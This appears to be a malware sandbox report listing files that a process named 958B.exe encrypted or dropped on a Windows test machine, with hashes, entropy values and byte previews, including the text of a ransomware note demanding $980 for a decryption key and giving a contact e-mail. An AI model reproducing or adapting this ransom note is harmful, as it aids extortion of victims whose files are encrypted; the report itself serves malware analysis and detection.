Preview:	GRXZD..s...Z...nl....>.{....\..kKAF........\|...vc.....w#.s.W.=(g_M.pK..XZ.q...m.#.-.f.&...C=pwu....&.D.>..........v.Ln9i0.{he..FA9~.6s..O...P.2...$G..^..K..~..W...i.#..r........7v.>..s1.\.N.B.?...#......M..\|..w?.a.D....$..y.cm^0....[.&.{p....x..k..TF..q..........w....6.$..o......{)5.y.......>......B?..>.....0pNQ'v.9....QZ..}..R.`~e...`l...-...;W.J]..3.Q~D2..%z.n..,{..._1...p.n.0.._+hW..E.,i[...l......r..&.."..5k'..A6...7x<g.M.......K"...aZ..\|..B.S.8..r...._..O..C.6..:.L.^..W.3l....X.W..>....G.v......9..@mi=0].2...1...^.>....mo.'...N'.<...........O..ke...............;"..;.._..H..K..3..\|....'fX.i.5..5.W.....V.,.m$./.@[..H.74..%].S...l....Z.{...&A.......s.Qp.y.qm. ...6XY1c/..o.a=.^. .zy>..1..z.gm.V.P...I*...\|txx.S9.O......F.........{.4+...VvcBc..W...3...%....<@.dj..yVWO..{..6...^............RWG5...C.I&g...P...z.G /7{E..t;nN.b"S.X.P.f-...^.R.l2.`.).\|R..lG.E.G`.J........h.}.............^?...5y.'m.l.8JS.k...NzzF......S...kF..R......\|..._

C:\Users\user\Downloads\NYMMPCEIMA.png

Download File

Process:	C:\Users\user\AppData\Local\db969c07-d660-4dc6-a8ce-143387f76dfd\958B.exe
File Type:	data
Category:	modified
Size (bytes):	1360
Entropy (8bit):	7.845878877073941
Encrypted:	false
SSDEEP:	24:NPUaRvd6G67IMrQVsE6y/XtLn8nY/kITb4w9pWE5f1q8kJXNYOwaBubGabD:NPDX6EMStLn8Y/kIYw90Efq8BVbrD
MD5:	2AA730679407EEAC655E4DD1D32F8B7C
SHA1:	2BB701AC0EE672C0FAA906EFEF802E926B13EF76
SHA-256:	F0F37868153F2D97ECECDB7D2AE722DDF0096330E3EA39E5DC0974FE10E516EC
SHA-512:	1C1DEDC42488BF2610410DC8D6B24AE6FA13E95E1895E78F568A72B5B29E9A57CA6B039309E3E6A46A76338FB8677D1D407ADBFE0E35A343C2855F87508AD070
Malicious:	false
Preview:	NYMMP......keBu..N2....Id.eC..xdM.jY7.W....H.%:...%t.k..4.....)i+..l....>.{...L..c^-Tb..1g .<..`......y.^...!a..ds.F.r...;.W]. ..93T.B.wx}.......f....D.....E....Y......DX,Q~.!N>........)j.79....g..07...F..F...p...[....`;<.~ .U.s.a.6w.t.4J#6.9q=.v./4G2S.\|..!z...p...S....6.i...'..`..H.\L:-..z....x.l..d.t..3.\|.......zp.K7....k.:....w.xg._..w.w...u...C.........3f..;...dl.%.P..by.g+.t..vZ.R.@...........?....\|..-D.4.E......L.H).'..mqQ..S....C....mv..#...CQ..q..'3.}-;]....}g...^B.'.j0....sT..4,X"..4.t..~^...H.$.P.:.]..}\.:%.9R .[.i@.i.GA.oOM'%.\..z.s..{.M..j(.b..-..PVrIt...K..."]f.v<.....A..:9..#H...l.<.\B.#.'p........S........<pQ...J0h...Ci..f...0c..........G...;.fm..g.j6..%SX.\..C.g0U....j.W2Iz....E....s..y]#...../.g.gU.o..G.....u.F...C.ZJ........'..?k.....A...e...\|....>in.\.e...O.=.S]~....I7.T.....U8I.G<...._-........^..`u.S}/.\.Z..O.B.:8.>a'n.Gx......N.?..{q/.i..Z...a.c.1/...5.e.wP(.q....W.P..2n.8.....K.j%...p(0..p.....P$..l..zJ..w#.$D.D.h

C:\Users\user\Downloads\PALRGUCVEH.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848986777130234
Encrypted:	false
SSDEEP:	24:zuBY/kqodW66RHmGcKXSzHHINTqvJF32oVUXqDKwYHlOghmQYy+s884vmEa/BHbH:y0eiHmGcKOUcF3nVUX+Bkuy+J84OEa/N
MD5:	A28E17D7F5F6825AFB0C8BA34AEDE4E3
SHA1:	20FFF01CA442F53752C9B64181C08275F8B98C24
SHA-256:	C21016867B10AEAE605D77E15CDE9759656E88317F0B46DF963588E0B4A1400F
SHA-512:	1CE2C38674D2B62C2721A3C3969DE903E5C7623FC993D57BECB8E347F5FE56012A2343191CCA2DAF0B507932DEEE0C208066E24AF1D6BA9C8359CFB4201937C3
Malicious:	false
Preview:	PALRG....#....9....>.$......7..Y\ru....tH.H.>J.z...F....Y?..p.0..5...SR"N4..a....9.vI.....{........2#..-.8.;\|C...NQJ...CA.R88...."............b.........B..j....r.q..NDK%..=Mh..(.....T_n.....V...U....Sg#\|.d.......(.....Y=.D.....R8YV.+....Dr.xjB.O$..)B..>(w......>.....U@<J...S .i...o5.,......Tw..:.(..<...C.@x4_CK......l/7.}..E..u..O..@'~.Z.P....![. .._;.......[-...7.w...X.~. ..k..6..ck.l..Pm..<?..K.H...m....7....`5..J..qV...W:Rk..$.......x .j...yh...T0%.6=y..a.J..7.V..;...r.h'..J,.....).......nu...rv\|y....."![.?DR.F...R..3~u.......R.e....d...,.O...d....w.K...).....TlD....[.XE...czX.7.ex...j..MX./.Z%.Y...^..X.Nq.C&.2@.A.......h!.J..9...V.W.,.Wk..s...YC.....;....W.....q'..U....r...O....'l.{.K{11.........)..h\|.'.Zv.}.1..v....ZV.9lOV.Z.$.p...y...C....";mls..~..;`jF.6.-......ig.#...w....j:z2@._zJ...@.).S.}.bnI....u..1T..?5X Y".{....._....xH......46........Ti....:hY.<"g?@...n.E&..........$d..Z....8...H.ke..O%.T......X)........*'.1..

C:\Users\user\Downloads\PALRGUCVEH.xlsx

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.847878523791198
Encrypted:	false
SSDEEP:	24:hQeHhQr/nlohMn53uvxgAeSeE7JX0GiJ9JEyFWk8ttIp1VCSnGYWVvyCGnIxkWZ9:hQ4i/loh6uv17JXyFFWk8ttIhxnrk6mr
MD5:	73685535CC9791F8807F339C6DB42B8E
SHA1:	48FD53A7ADA3A0898F88D9A66FD14AE64E6E9639
SHA-256:	3EA55944EA9C579107D255DF8BB6F5485C1BECC00980102B203626AD5388C846
SHA-512:	66C125E18B3D5119442E0F0A57719679A0CD745303ACE1D21EA5C4A8F46C083D7785EAE76896C6883427C7140494D6A4BE3DC0889FAFA527A477C5840C1A9A35
Malicious:	false
Preview:	PALRG#G....h.....1.K.Tq.....N...VA.g.G.0......y........c........;$.z..H.*.X.\|h...V..$y).>Qk....W.H.)......<...Rl..........k,/.~..F@r..b,<...\|...p..)..U..z+....xd.C...7#....v...J,.'..:..i...+i8(D.....FQ.S."..........H....,.G(.-=.........M.}.G.m",o.[.`.E.f{Ji.a..)A9.n...l4...9.k.....f..m....k..p.%f.v...I..yJv.....s42..4..CD...T.?.eH.m...g..82t...4a..zG.M5.......8....H.T`....6.._C..8(..ds5q..l.+Gf.MD.....^.!.@..i.1.....(....t/i....&V..-HP....h;j.-....UW...o.l.t;@..w.....a..>%....... ..r.?.<...:0..0>.m....^.........= ?.F.h^Z..9.s...-!7}.n.n?RL...5.4...8..5.<m<.....U.-l...&9..._C...2......I.q....Tm.Yw.Y..].w...(7>.,7k.7.(A.8z/`@..ui...b.."%@..v..1....Y."fi..$..K...h..p..d..4....<K.>.T..2_.....AN.S...#R....].$p.....K..{...>.WRLM[.........rJm.}...ou.W...<.i..v.8.q8......w.^c\.U..&_.Yg.w.&.....A..G.....J=T........".f.D%v.......?......D..........W....XV...J?....MU.$to..6.>qdGA.&...L......^b<MCw..7.Zx-."]..-C.0..'..a....a&.....h.\|20=Q..4.4

C:\Users\user\Downloads\TQDFJHPUIU.jpg

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.81118040803132
Encrypted:	false
SSDEEP:	24:SCkLWgIl36wPdXoQbrFhNgs7xziUrGVXJIPDw5tGZlrTZ8o9qA5rOQZ/GbGabD:Sk9P9oQbrFhLxzXkIPk50zao9qAcjbrD
MD5:	DD5CF5BB6CE5623687793CEA894BE62B
SHA1:	44E4B2EE501517FFCB1B6C270FBA7A801699B468
SHA-256:	AC1DE90620787AC68AE7A2FFFC1B33CF5AB528AD93A991331ABB61C0410DC9B2
SHA-512:	6FF5A8DC2E1E0C82E146F9CF19AE38626BF35C74AA67622650BB6CF955AAFEBE795EEE6C83E59B9DDE153C74A423B1724CA63EEF0EA99BFEB2064FA75B993DC2
Malicious:	false
Preview:	TQDFJv.X+...(E... Eu.8.......U.hK..'.BYR.`.{.G..y.(.geR@,...O/{..RrO....n..._...y..S.A..G.....e9.0...n..CzA..$.wX...[...s.Z;4..Q....04.BW.@b..#...8....;y.B.Ah.P....D.]-..D......gF.}...]......+...`.".]2.p...m....I/?%\G.).x..b.....'r`..P.2%.....rW..g....!..[..T.%....;{......%....w..$d.Rk)?:...>.f>G..F6.....&D@....sj......rxM..a.S3m..R..&1 z[..#.S....:...z...~.78..7.~e.................P...{..^.H.H(.=^...9..@...}..Um\|'.3...`[oUT>)...".)...O#........_..\|.$Xr,.....j{2..............g..B:..M........9..dR>...0...8.u.3[.\:h_...l.......l.5..p`_..8...Q.....)Qj.QO.@......p..B...k..%!...,...a...{..`t...).....8.B...r]OM..c.[...T..8_g6.....@./,.H...L.).....%....y.?.#,....d.1L..6!1......M..Yf7..P..;...]...]:....,.a!.. =0..,.B.....^....@..V%......q.Y.e...../1./..L.&..6.g7.%..b..1.a...3..#Ok.R..!.X.\..^..M!/...\.Q..B..\v.....L.)2 K.W..u.k.......D...n.iP...Z..Z..l."..0..m.......Yeb...e..g.}.%.G...xOd=.GU.f.c&..gP..A@A..T....L..1M!.6O.\0....X(....it....(X..K...c..%c..

C:\Users\user\Downloads\TQDFJHPUIU.mp3

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1360
Entropy (8bit):	7.848296379390793
Encrypted:	false
SSDEEP:	24:etvUIXujDP40MEXrProAcsVDv9XQNq+FLH51kl+XMcra1kMj2qCmcUmAZ7/utbGE:etvx2P4KbPkAcsVDFXQXD51kMBr2AdUm
MD5:	E026F49683796823E0C4F4D62CAF1D7B
SHA1:	2F574AE3B8305E38F92BD71FA548831A08FC47F0
SHA-256:	777B6F77BB1822C258865DE9247633CC88959334A7D39FEBD426DAA382A1CAD3
SHA-512:	374279F1AD619DB9418ADCDB096783D57910256F12AC2BF3DB4D57E1CE680CD64E5A2A3CE45B20B3AE092E9FB860D06691DC9EC50BA9EE54A7DFB4438FA153E8
Malicious:	false
Preview:	TQDFJ..f.Woz.......E...^.%.J...=..a..PE...>h...(..Zi.trp.....s.k..v88.>.PI.....E%..LD+g.J..(P.#.W.....#D..F-.J..J{H....fH.....H<l.b.-....\Ul.C..>...!z..#J.SW6.....pc.....7hK.\./._g.aSr.a....q,.#..l.R.....u.}.`...J.Q............c..6X....+...@r.K...eO)...X(2Tt...-\..X..1^^...y..PuQZ^...-..+../...k.V..l..@.Q.a.g /.2.V..'....=.u7R.....z.G>w.r.s.^...2..8.@...6.D8..]KI.fy@......(..>....5.X ...EI.<.B.k.R.)v@dd..R7.v..v>....t>D...'..j......;.\|{..........D...~.. .,.......d.V.Q=.O..o._O.H$eH...8.o;..r.u...pak5.A....o...w.....r......[x2.j.eq$...a.....:.y:...\|...s........... )R......qu..../......H..z.T5.D..u9.XD..........<1i.._Es ..m.......K>.n...s....`..`5.e...3A.53A..m7.or._..r..u..l..%d.....-.+Z.3.....!$l!.)^..{.\..f/.,.@.K...Q.k..8[..\|z.....rK.1...Q.8....t....CH...,#....U.F.X....B..... ..4......wy..!Ghw{m.).r/...C.8.V<.B.M...$.z..0.b7u.S........a].c.[.s.......-.y< .....w@..{ly.i....?Y........BqK.}.1.f..[q..._...~..W.....[_...".(..}.-@.{\

C:\Users\user\Favorites\Amazon.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.4749324837225775
Encrypted:	false
SSDEEP:	12:NDm5tHOGMT634mhJM8legnO3qbZdHIHQnQQlTbryQ3cii9a:Rm3uGUG4/gaAIWJbGabD
MD5:	CE06333FA3B35A65B787DF30F723BA86
SHA1:	4B65E84DF076C6730692460EBD999AB89086014B
SHA-256:	CBEFDB5D5BDD78E4F5AF04219AEAC279A7A7C3B0768EFD084044398F610895D3
SHA-512:	946F5F7380C5B881BAB444E417D931856FAB14B9A224172DAF736B7196DD9984D6D236BDE0DE5609CBD6A53852B9F03ABA970C45181FC37BAC81CD536C90FDEF
Malicious:	false
Preview:	[{000...^_.............}:.~}....4......~Y..+..GU.......`~.../5H..4..~.#.X...Z4.F....y.Qd.J..c....QRW.~.e^.s.<......].1K.4..YH.F.8.3.......{.q...qoTV....#.\|..p.k..[....9......L....?.K...,..i....,H.........&.v.O...*vmR.3...U.......O...0o.@....y.e...;."j.G...Kl..s......x.n........b...'...Y..s.s........GV>BN..VI.....=...[.<0[z.w.u.[.."."C....\....q.r.H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Bing.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	542
Entropy (8bit):	7.555784420828238
Encrypted:	false
SSDEEP:	12:K2nuf7Mh12juQTaylZBhEUFZWDX3fAm8tGmTbryQ3cii9a:K2I7M4uQTaI2UFCX3fp8/bGabD
MD5:	69BBDBE5B6E67C0A18AA91B29DF2A47F
SHA1:	F7FCE3328AD61E714ED36DA301A32753082C49C7
SHA-256:	A8554A5812AB043ED1C74DEA01A5AB8E48B9580FDAA2AAE14DD5684DAED1AEB0
SHA-512:	3983EFDC49E8164BB5BB32110C21EC323C60398648BA74B486CE5CC3570B9157FB1DA1A86EE8BB3969A4334B52B8B31E1E014FB659064799A665403B036D3D91
Malicious:	false
Preview:	[{000...0..@.{.oH..E._.y.H......D,..\.Vpear#4#.....#9.(..f.2.;q..NZ...}...tc.;w1.<...O5.`..9.....C2.#...K1.!..?A.....(...#..2."Y.3.si..Q{`2..=F..&...B.".9=I..k.vi)i.o.C%.....1..(.e....na5B])..i.i.?$8.9...d.y.kH..X^m....~.....\#.[T.......[G.Oh..l.7L.Zc.p..>'.dT....?4k......N.M.....!6.*.4..<5.L.Y.d..h....... ..v'.$.L.^.......... ...4S.rn.?....^r.^P.F...oy..m..q.@...q.~L..#....>......;.e...p.@6Wz..K.t.........7..Fd3...\|.8.@..t..jTm....QH5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Facebook.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	447
Entropy (8bit):	7.386556884287304
Encrypted:	false
SSDEEP:	12:N+/4AiIuywgBsdzh45ztOBSworzmMD+IFJhWTbryQ3cii9a:iu5PzeJtOdorz5S2JhQbGabD
MD5:	25F69440C8A484EF79389F137EC782E8
SHA1:	EB7AF306F5C8B95C1D6518F693630390D6292EE1
SHA-256:	2D3F52EF525973348999051CBE6A7A78A021510CDED3570F9D087D6DE66F8698
SHA-512:	2818EC190179250E4AEF8C95CD61F0C81B42DB1931850C80EB23770D36FCDF86018A37B1E2D52D99AB9F059FEC274E1A8FFB731360949335B5B9ADEAF45EF9A2
Malicious:	false
Preview:	[{000.x.....Q..P....#Vd..\|.0.w..]v........%.n...z..{.,..X..9....-.S.A.62.?..hA%..].khh)>..0@f.3.xY.R.8......\..R..).N]7E7?./1.q....6/.=o.Z..F..k.......{..'.....&..c.q..m..O!&.J4z..\|......#..k.%5.Sh"..Y.zr......m...4....M.>..;..q@...A....s0D.4..L.!]."J4..E...l.F....BgwHC,..S....XVV]=i.kM\S..3.S.JK:.:..X...5.......\|..Y.C.G...oUw,H.9>....2A..r..V>K...H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Google.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.433882132106508
Encrypted:	false
SSDEEP:	12:3zRiBhmA/KuzUWM8GgtzOasir8YtQ+yrMmTbryQ3cii9a:uhmAyiP5tzdf3yrLbGabD
MD5:	14EDAA65FD6070E6046BE82A90FA8E15
SHA1:	B1D5520511E4B794E74894D59A11D17A080AF1F2
SHA-256:	E95778A96C1BDF309D52B1D961F7F1536D4EAD33190310EB938120FF937515B0
SHA-512:	BE841BF7162FBAD2D91E5E47BCDF51DF5073EF9F943B0E8D17DF4E7A3842CD997D28279D7DD7D6ECAE382F47AE2259F45796A760E7CB7FDE3CCBF63BFD701FCF
Malicious:	false
Preview:	[{000...Pr..m...9.I.E.X..Q.........a"8..^;...H...M.....EL2..C7..+NV<.H[.Yw....[;^.8..$.f.W.j.=....vi...RY.;u.7..l...g...'.^.8.l.[...Y=.'..L.$..........X[.+P?.t.9....+..~..........y...v.;V+...gm.}....1....T>.S.B.+..'*.....0b.bc.GD..? "..P...."......}./..Z.;DW>.Qa..#a....T...Y !D.lr....XJ.a'u..G.=...w9.0GN.x;.o...g........L....Y.D,=F. ..u&P.N..s.....H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Live.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	443
Entropy (8bit):	7.440616827988648
Encrypted:	false
SSDEEP:	12:cOj6xye0t3uIaYLJV/3sPyP2YS0VTbryQ3cii9a:zj67UkYLJV/2BYv5bGabD
MD5:	C08F473AC634481373AAB39BAF86B1C5
SHA1:	5F1640F75CED4497138D859CABEF4E91292E408F
SHA-256:	F838977A1D6335E8AB8F0CD9C92598D9CA05CFC0CCC29163E973EB19FC6C5767
SHA-512:	271660030E10CADAD1C776CFC1BE1E082BD748A7231E35FED79424B0051C2C70ACCF03303A9034D001F86012AA8E2D31AC37BDD35A0FE589E691D79CF8813C1C
Malicious:	false
Preview:	[{000...-.o...V....@..X[..t....h.J0..z..5..e.?.Hz...Oqr.....b..}`..+!.f..,Q.y)...BX/sA.Nl.y...f.>6.~0...Y.f9m.).P.X..C....$h.W~#%.S.d.]]04..W..:.0......_5....=.:fP....E....td....k....E.....)?W~..L...a.J.3.\.......3.*...RLF&..2s._.....xF7.)...-.2.<........0..(......JRY........w.p.D.E.p......... ....Gmt.H.g....h.x.J....C....G`.._{.d.?p.+mvv..$q.UH5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\NYTimes.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.439822693774911
Encrypted:	false
SSDEEP:	12:CmvrE7vt7G89jJaGHxSlwc3UlJesNgT51FfxTbryQ3cii9a:Rg7gGaG8xCesS5btbGabD
MD5:	F15488178680EDDD210685AB09FA83BD
SHA1:	FEE3A026567F902EDA7205B283C3A018982406C2
SHA-256:	17F735D1DA64388C72B0CEA25CC0FEA2A9FA3408101A70A9F564AADFF1EBDC40
SHA-512:	8976C6E82F8BF121974C2573DB531804A413D470A0D8652B5CD90049BD2A1CFE7FA9F90B05DAA155872334086739973D5A7B89A35C73B5987A0B5A3B10577C26
Malicious:	false
Preview:	[{000,.U..qG...L.]..H..wJ2...A.=. ...x.s.........p...I...:..N...]..5J....F...kV^.6.....[+.6..w.;.p.o.!1.6C.q,..x...H.c.Y.F.<08...#.6M...(..%\|.j....zX...!...`..g.r5B.2..R...n7..R$..@...C.W._.t...<e.@2b.o2.....d..gN...j$a.8....i......m.=4f...i.m8O(....rI.]g...-%.qD-7Z.J........\|q.h~......T$...$...~...@ .<PW-U....7O"Y...Z..M-.!..........:.{.......D.H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Reddit.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	445
Entropy (8bit):	7.401920742159265
Encrypted:	false
SSDEEP:	12:ceROKpydiBO/TlS/R8pmemVtC2TbryQ3cii9a:7ROwygas/R+mVkwbGabD
MD5:	4F29C1D52337C2C08F70ACA7F420E593
SHA1:	37B5A652AFCA12490605C045B5572079965DF0F3
SHA-256:	E5D57088C6B0ABA5EF3FD96B31D3501D8E8DB3CF427B90AD627CD820E794D74C
SHA-512:	1A5A19FE2B98E198DC0D2925ECE7D454925A9386DBE1B5633118C1002FFD6BC960172727413E5A4A6BF784DA2B962A5D6E6C2B04D7FC88CCE4DC0CD2BA4F04D4
Malicious:	false
Preview:	[{000...!eq#...@..Q&..uw.....(....&.g.<...x.._).YO^K.I}v].a.$....).B...-.fW.rhEe..>... ...........1..l.......00I...]s<).*!G....q`z...;!.>.}wM.....S.1{....&....oi?....6^....p.09z...=:.p7..Q.Y......o......}.x.q..._Q..9._.Z..Ff.\|w4..F...`.c]X..>.>)<&.v9...y...Q.....bt.X....T....g.o..?....+. ......g.E.)J.S...qb.y./.e.l.=t.l. .d`R....\..p...^<....b....H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Twitter.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.41326004420206
Encrypted:	false
SSDEEP:	12:3EMLTpZ2xt/vfQn4hxUH3YoT7F5StTbryQ3cii9a:UMLFIxvT/UH3YoT7F5SxbGabD
MD5:	0251C6F9BD903F4492DF5360C5803FBE
SHA1:	121DF5BEA8516CA16D39764A735A6FA97046074F
SHA-256:	7A8303B4EB69308F4D0F01813A14B7E501C590DEA953E0BF78FD863A18FBC468
SHA-512:	A3191E7DE1906DC324A521B9084739B5AFEB59B9C9991390486B13A4A4CF87513E5D6A822477A0CF670D00E0AAC20C6DA046373AC04770BD071F2E4A4D2E3993
Malicious:	false
Preview:	[{000.x..zX...F,l)....U.......E%..Z..--O.uK.,...\|._Kz..>..LD.7......dt./p]}...-.x..<t..G......4,..M.{..zx.n...iW.5.A.\-..\?.l;...IVK.I"}.Y.?...NCI.r..m....d,\|m%..N..-...x..r.'t.B"Y:uw.Vv.8....p..=..w..U.-.0AY_.....[N.ON....C.a....$.5.....&F.n.U..$. .)_..v..s.....'..r...<..8.m.....-.G.B.E...........K}.....b....].Z..........&6.0.n3.}...Y.z.5..a.fH5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Wikipedia.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	448
Entropy (8bit):	7.454823031587869
Encrypted:	false
SSDEEP:	12:4y8doNnh0v1N3cJum0objZgBP6esuDTbryQ3cii9a:4y6oiaN0L9HbGabD
MD5:	3FE6A4ECFEF51722198B4CDC32DE882C
SHA1:	F836FD9F07981B197B6ED0306865B86CAD7A621B
SHA-256:	C9EEFAB4D79A9F86E24539D26F8DD74E93C57AADE0239865CAE4EA907AEEEC5D
SHA-512:	5D49AAD6B9B27B18A60AA4F9CE4FAFB29D2B910A24614D149D358F5FC9E1C2935EFBE63EBAB88F2909C8002571E39CC723959A08A2A3C9C76675433C31A1D982
Malicious:	false
Preview:	[{000..q....#B..._.%7R..{..P..5e...'...mPtL:........ .BD.5..5IL8...b.\..b,!/.\.%!..a,.1...<.z..U..{ks.NNu.+..w..c..<.lc..j.W........as.}.iep1...5.^....xZ$...H.wR.>a$.1.q.. (J!.....tF...i......!..{...#....d.PL........3.6..[...vG...K.*.Y......{S.,\|M..mR..b..^..>...l...........VW..vl$....8.<...4..2O.G...Mj..^.....t.8r.z...8.O..Q.}\......19GP ..q...}..gn...H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Favorites\Youtube.url

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	446
Entropy (8bit):	7.4737084719958675
Encrypted:	false
SSDEEP:	12:oZfktmQUNppgqp9YPEqD7o6MJ4tOMuYMC6VuL+BTbryQ3cii9a:oZfSUXOqKEd6i4tMnoqbGabD
MD5:	DCEE9C08152F28048A9A1A44FA6E65D5
SHA1:	82538F5D4BBD236C4AB149469A6A17F5576E4EEE
SHA-256:	43B22D24EB3325CCEB2B2C78F4446B16D1563B77AF8D6B210C7ED43563383E9C
SHA-512:	A528D92BC62A1DB1721F1D54D796BC4426DC1CEF5D5E6A90F4DB1493FE60D96A4D9198407946BF6C63E206BEE6AB141CC409EAFA975EB5AF0B909E6CCAE5A3BE
Malicious:	false
Preview:	[{000=.:x..J9P....q.R.......w.+\.x"..@.7....`.......d~..K.[....sr..:(Y.I. ...l...3D_G...Z#I.g=........<.s...]cep......>."@.i..j.v.v."...\|n.D3.....5..EB......r...J...J9..T.N.J.^...@...E....$..G.&..8.p=.;\..Gi.2....j...;.!..(..\....")....KJH..K?^.L.......1.........K..R.T.=....@..4.P.E....9:3........e..k..R..2..aX#.l....X..8....% p{.q......2.[r.H5GEqFET71y3XOoh3oKtw1e6KTqWYzciYNTqNfX5{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

C:\Users\user\Searches\winrt--{S-1-5-21-2246122658-3693405117-2476756634-1003}-.searchconnector-ms

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	data
Category:	dropped
Size (bytes):	1193
Entropy (8bit):	7.849484447209135
Encrypted:	false
SSDEEP:	24:2JB/XuiuCfxKOpeD7XopnVG7ODJ8u4hSUtUXOPgwv0I7hbGabD:88ZD7X8Q7OqxuO6I9brD
MD5:	8EBAF9C630497E62548ED344B33952A2
SHA1:	A8E929874F98B93A64A054A8409725B092DB3A3B
SHA-256:	C48504227FA8AFF163D62D108C43C44A2A9AFC56E0929B42808BA0AC6AD25B3C
SHA-512:	8DA284D54CA5FCCD110A1D23FECAF4D1BA2B95E48C6F5B1CFBB7DEA8F7CA16F8081586463981FEA18BB004473B5BC749194F32E239A3A115211BB3789C6D48FD
Malicious:	false
Preview:	<?xmlk.t..zS..16~..._.....0t..... ..... .z!........^.+..+.....0]bD.....l.8`.>Z..PtU.i.X..;v.....9.A....5...F..n..\|.6.$..V;.,Y.lh_v/......p....2._.......t.rfU.T..!.i.=.T...p..>.g.>^.<.~..3....xr...j.[...\\...z.d.....(..fGT.k~,M..L.......a.z.~-...3.'=/.?s?....1N5.G!.M..S...=D.1.s.]O....5......JO.N..$..Wa../p+..C.+;...)fLt..c#...UHZ...5..a5.o.q..........&.....3#.L@....1N....r.......w%f.q........u?..L.......Q....S/t..:D.}..6EN.)yF~....t.I..../J..u.JYj.a..R.87,......gEp.=oe.~8W...n#.Z.....hHQ...0.m.h...L.K...`.{...I...\|.B.Wn&.o8...>.Y]..^..O...}P.Na.._...#\|.B..?...u.kJ.=..Y...r..&r}.K..B..rB)!.Q......../..uT5....s.[E,U.F.E.+...#...%b.....C..`....e.$..0..8R...k\|..."k\|p.......>...J....X.F.B..\..........;$..'.)_$P'M...@.L..#8.\|...U..7...D.<..K6o...C......i..0.q..o.y.&.4...=7?,.u....AW.&.9..dU$.4>...."......].9.v-.K.y...;...>...........M.Z.G.. ....yM.[W..>4C...m.I1.V2.}...._f.jpn.+.=...k.gG.?...~[..C........T...kq,RZ8Y.,.Y..<XK..-%3..W..W

C:\Users\user\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1114
Entropy (8bit):	4.874792337269828
Encrypted:	false
SSDEEP:	24:FS5ZHPnIekFQjhRe9bgnYLuWyrmFRqrl3W4kA+GT/kF5M2/kLw3KTJRybGQ:WZHfv0p6WyrPFWrDGT0f/krbybH
MD5:	0FD2F9DEF16C2AB15CA8232B3081E019
SHA1:	B8AD094FFBB141352F626DB0A9ED02BACEE05EB0
SHA-256:	B3469C3CDE8A6898506ED59E26B302D21564F2361E02C23590672A7611253B4B
SHA-512:	58B072E055DB27A65AAB2117274541D64EC8847881F8DEC1A280BA8C597D87A4D80DF473403A628CCA1AB1BB9E635D9B35DE724C5E82F3DC381BE37870C110A8
Malicious:	true
Preview:	ATTENTION!....Don't worry, you can return all your files!..All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key...The only method of recovering files is to purchase decrypt tool and unique key for you...This software will decrypt all your encrypted files...What guarantees you have?..You can send one of your encrypted file from your PC and we decrypt it for free...But we can decrypt only 1 file for free. File must not contain valuable information...You can get and look video overview decrypt tool:..https://we.tl/t-xN3VuzQl0a..Price of private key and decrypt software is $980...Discount 50% available if you contact us first 72 hours, that's price for you is $490...Please note that you'll never restore your data without payment...Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours.......To get this software you need write on our e-mail:..support@freshmail.top....Reserve e-mail address

C:\_readme.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\958B.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1114
